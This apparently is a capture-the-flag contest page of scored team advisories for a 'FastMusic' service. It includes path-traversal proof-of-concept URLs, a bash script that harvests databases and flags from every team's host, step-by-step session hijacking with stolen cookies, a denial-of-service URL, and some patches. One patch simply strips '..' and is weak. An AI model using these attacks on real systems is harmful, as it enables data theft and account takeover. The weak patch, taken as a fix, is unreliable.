| |
FastMusic Advisories
| Service: | FastMusic |
|---|
| Text: | FastMusic service has arbitrary file downloadable vulnerability.
poc: http://10.23.x.3:82/music?action=get&name=../databases/__db.001
solution: filter slash symbols /, \ |
|---|
| Jury comment: | Give some exploit |
|---|
| Score: | 2/5 points |
|---|
| Service: | FastMusic |
|---|
| Text: | Vulnerability:
Directory Traversal
Exploit:
http://10.23.X.3:82/music?action=get&name=../databases/fastmusic.db
|
|---|
| Jury comment: | Too late |
|---|
| Score: | 0/5 points |
|---|
| Service: | FastMusic |
|---|
| Text: | Description:
Class: Arbitrary file read
Vulnerable
The fastmusic service has an arbitrary file read vulnerability via the
name parameter of the get action on /music:
Exploit:
http://10.23.$i.3:82/music?action=get&name=../databases/playlists_fastmusic.db
Patch:
Add the following block to the nginx service configuration
(sites-enabled/fastmusic) in the location block
if ($request_uri ~* "name=.*\.\..*") {
return 403;
}
|
|---|
| Jury comment: | Too late |
|---|
| Score: | 0/5 points |
|---|
| Service: | FastMusic |
|---|
| Text: | The sercice stores the flags in 2 databases.
databases/fastmusic.db
databases/playlists_fastmusic.db
You can get flags from all teams with this exploit:
#!/bin/bash
for i in `seq -w 1 99`;
do
wget -q -O - --timeout=15 "http://10.23.${i}.3:82/music?action=get&name=../databases/fastmusic.db" > db-fastmusic.$i &
wget -q -O - --timeout=15 "http://10.23.${i}.3:82/music?action=get&name=../databases/playlists_fastmusic.db" > db-playlist.$i &
done
wait
rm db-fastmusic.45 db-playlist.45
for i in `seq -w 1 99`;
do
sqlite3 db-fastmusic.$i .dump | egrep -o '\w{31}=' | sort -u > flags-fastmusic.$i
sqlite3 db-playlist.$i .dump | egrep -o '\w{31}=' | sort -u > flags-playlist.$i
done
exit 0; |
|---|
| Jury comment: | Too late |
|---|
| Score: | 0/5 points |
|---|
| Service: | FastMusic |
|---|
| Text: | Patch for arbitrary read
--- MusicHandler.h 2011-11-12 12:17:52.000000000 -0500
+++ MusicHandler.h.new 2011-11-19 16:29:12.011614372 -0500
@@ -43,6 +43,7 @@
{
std::string name = params.GetGetParam("name");
headers << "Content-type: audio/mpeg\r\n";
+ boost::replace_all(name, "..", "");
out << TemplateReader::ReadFile("music_files/" + name);
} else if (action == "users")
{
|
|---|
| Jury comment: | |
|---|
| Score: | 3/5 points |
|---|
| Service: | FastMusic |
|---|
| Text: | Vulnerability:
Session Hijacking
Description:
Session hijacking vulnerability in FastMusic lets one user login as another just by changing the cookie contents in the browser. Although this could be done with a man in the middle attack, because the database_cookie.db can be browsed to and downloaded, all sessions can be gleened and we can login as any user.
Method of attack:
1. Browse to http://10.23.X.3:82/music?action=get&name=../databases/cookie_fastmusic.db
2. Download the file
3. Open the file (I used vim) and find the user that you wish to login as. Copy the long string of characters that comes after the ^@^@^@A^@^A and ^@^O^@^A for the cookie.
For example if you want to login using the following user:
cizw-bir4-dlzr
then look in this string:
^@^O^@^Acizw-bir4-dlzr^@^@^@A^@^Ajeqwmuqszhhmhbfpcciswcwrniwopuqazizncpgdynriqwxuahmwlipysmpkifmj^@^O^@^A
copy jeqwmuqszhhmhbfpcciswcwrniwopuqazizncpgdynriqwxuahmwlipysmpkifmj
and either:
copy it into the cookie field while you replay the packets or
you could use cookie editor in firefox to login as that user.
Mitigation:
Set a regEx expression that checks for anything except for '-', letters and numbers e.g.
|
|---|
| Jury comment: | Too late |
|---|
| Score: | 0/5 points |
|---|
| Service: | FastMusic |
|---|
| Text: | FastMusic DoS vuln
POC: http://10.23.*.3:82/music?action=get&name=
solution: check name parameter for emptiness/invalid value |
|---|
| Jury comment: | |
|---|
| Score: | 4/4 points |
|---|
|
|